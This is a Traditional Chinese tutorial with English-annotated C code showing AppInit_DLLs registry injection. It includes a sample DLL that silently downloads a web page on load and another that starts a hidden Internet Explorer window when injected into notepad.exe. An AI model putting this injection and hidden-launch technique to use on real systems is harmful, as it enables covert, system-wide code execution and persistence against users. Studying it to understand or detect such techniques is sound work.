登錄檔（Registry）中預設提供了 AppInit_DLLs 與 LoadAppInit_DLLs 兩個登錄檔值。
在登錄檔編輯器中，將要注入的 DLL 路徑字串寫入 AppInit_DLLs 值，然後把 LoadAppInit_DLLs 值設定為 1；重新開機後，指定的 DLL 會被注入所有執行中的程序。
工作原理：User32.dll 被載入到程序時，會讀取 AppInit_DLLs 登錄檔值；若有值，則呼叫 LoadLibrary() API 載入使用者 DLL。所以嚴格地說，相應的 DLL 並不會被載入所有程序，而只會載入到有載入 user32.dll 的程序；Windows XP 忽略 LoadAppInit_DLLs 值。
例:寫入DLL
#include "windows.h"
#include "tchar.h"
#pragma comment(lib, "urlmon.lib")
/* Download source and destination file name used by ThreadProc (sample values). */
#define DEF_URL (L"http://www.naver.com/index.html")
#define DEF_FILE_NAME (L"index.html")
/* Handle of this DLL; set in DllMain and used by ThreadProc to find the DLL's own directory. */
HMODULE g_hMod = NULL;
/*
 * Worker thread started from DllMain on DLL_PROCESS_ATTACH.
 * Builds "<directory of this DLL>\index.html" and downloads DEF_URL into it.
 * Returns 0 on success, FALSE (also 0) when the DLL path cannot be obtained
 * or contains no backslash; the result of the download itself is not checked.
 * lParam is unused.
 */
DWORD WINAPI ThreadProc(LPVOID lParam)
{
    TCHAR szPath[_MAX_PATH] = {0,};
    /* g_hMod is this DLL's own module handle, so this yields the DLL's full path. */
    if( !GetModuleFileName( g_hMod, szPath, MAX_PATH ) )
        return FALSE;
    /* Last path separator; the file name after it is replaced below. */
    TCHAR *p = _tcsrchr( szPath, '\\' );
    if( !p )
        return FALSE;
    /* NOTE(review): the size argument overstates the space left after p+1;
     * the remaining capacity is _MAX_PATH - (p + 1 - szPath) elements. */
    _tcscpy_s(p+1, _MAX_PATH, DEF_FILE_NAME);
    /* NOTE(review): the returned HRESULT is ignored, so a failed download is silent. */
    URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL);
    return 0;
}
/*
 * DLL entry point. Records the module handle in g_hMod for ThreadProc; on
 * DLL_PROCESS_ATTACH it emits a debug string and starts ThreadProc on a new
 * thread so the download runs outside DllMain. Every other reason falls
 * through the switch and does nothing. Always returns TRUE.
 * NOTE(review): the thread handle is closed without checking that
 * CreateThread succeeded (hThread may be NULL). The L"" literal given to
 * OutputDebugString presumably relies on a UNICODE build, matching the TCHAR
 * usage elsewhere — confirm the project settings.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    HANDLE hThread = NULL;
    /* Stored for ThreadProc, which needs the DLL's own handle to locate its path. */
    g_hMod = (HMODULE)hinstDLL;
    switch( fdwReason )
    {
    case DLL_PROCESS_ATTACH :
        OutputDebugString(L"<myhack.dll> Injection!!!");
        /* Work is deferred to a separate thread rather than done inside DllMain. */
        hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
        CloseHandle(hThread);
        break;
    }
    return TRUE;
}
/* Command line pieces and the host process name the second sample DLL reacts to. */
#define DEF_CMD L"C:\\Program Files\\Internet Explorer\\iexplore.exe"
#define DEF_ADDR L"http://www.baidu.com"
#define DEF_DST_PROC L"notepad.exe"
/*
 * DLL entry point of the second sample. On DLL_PROCESS_ATTACH it checks
 * whether the host executable's file name is DEF_DST_PROC (case-insensitive)
 * and, if so, launches "DEF_CMD DEF_ADDR" as a child process with a hidden
 * window. Thread attach/detach and process detach do nothing. Always returns
 * TRUE, so the DLL stays loaded even when the host does not match or
 * CreateProcess fails. From a defender's view the observable behaviour is a
 * DLL spawning a hidden child process from its entry point only inside a
 * specific host process.
 * NOTE(review): `return TRUE;` after the first `break;` in the
 * DLL_PROCESS_ATTACH case is unreachable. pi.hThread is never closed, so each
 * successful launch leaks a thread handle in the host. wsprintf has no size
 * bound on szCmd (MAX_PATH); it fits only because DEF_CMD and DEF_ADDR are
 * short constants. DEF_CMD contains spaces and is not quoted while
 * lpApplicationName is NULL, which makes the executable path ambiguous for
 * CreateProcess — confirm quoting. Creating a process from DllMain is
 * presumably subject to loader-lock restrictions — verify.
 */
BOOL APIENTRY DllMain( HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
{
    TCHAR szCmd[MAX_PATH] = { 0, };
    TCHAR szPath[MAX_PATH] = { 0, };
    TCHAR *p = NULL;
    STARTUPINFO si = { 0, };
    PROCESS_INFORMATION pi = { 0, };
    si.cb = sizeof(STARTUPINFO);
    /* The child window is requested hidden. */
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        /* NULL module: full path of the host executable, not of this DLL. */
        if (!GetModuleFileName(NULL,szPath,MAX_PATH))
        {
            break;
        }
        /* p+1 is the host's file name without its directory. */
        if (!(p=_tcsrchr(szPath,'\\')))
        {
            break;
        }
        /* Non-zero means the names differ: do nothing in any other host. */
        if (_tcsicmp(p+1,DEF_DST_PROC))
        {
            break;
        }
        wsprintf(szCmd, L"%s %s",DEF_CMD,DEF_ADDR);
        if (!CreateProcess(NULL,(LPTSTR)(LPCTSTR)szCmd,NULL,NULL,FALSE,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi))
        {
            break;
        }
        /* Only the process handle is released; pi.hThread is left open. */
        if (pi.hProcess!=NULL)
        {
            CloseHandle(pi.hProcess);
        }
        break;
        /* Unreachable: the break above already leaves the switch. */
        return TRUE;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
執行登錄檔編輯器 regedit.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNvwVZ2x2bzNXak9CX90TQNNkRrFlQKBTSvwFbslmZvwFMwQzLcVmepNHdu9mZvwFVywUNMZTY18CX052bm9CXz0EVPhXTE50MNpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2LcRHelR3LcJzLctmch1mclRXY39TO1kDOxgTMzIDMyYDM4EDMy8CX0Vmbu4GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.jpg)
修改 AppInit_DLLs 值，輸入 DLL 的完整路徑
修改 LoadAppInit_DLLs 的資料為 1
重新開機後生效；檢視所有載入 user32.dll 的程序，發現都被注入
當 DLL 被載入 notepad.exe 時，以隱藏視窗模式執行 IE 並開啟指定網址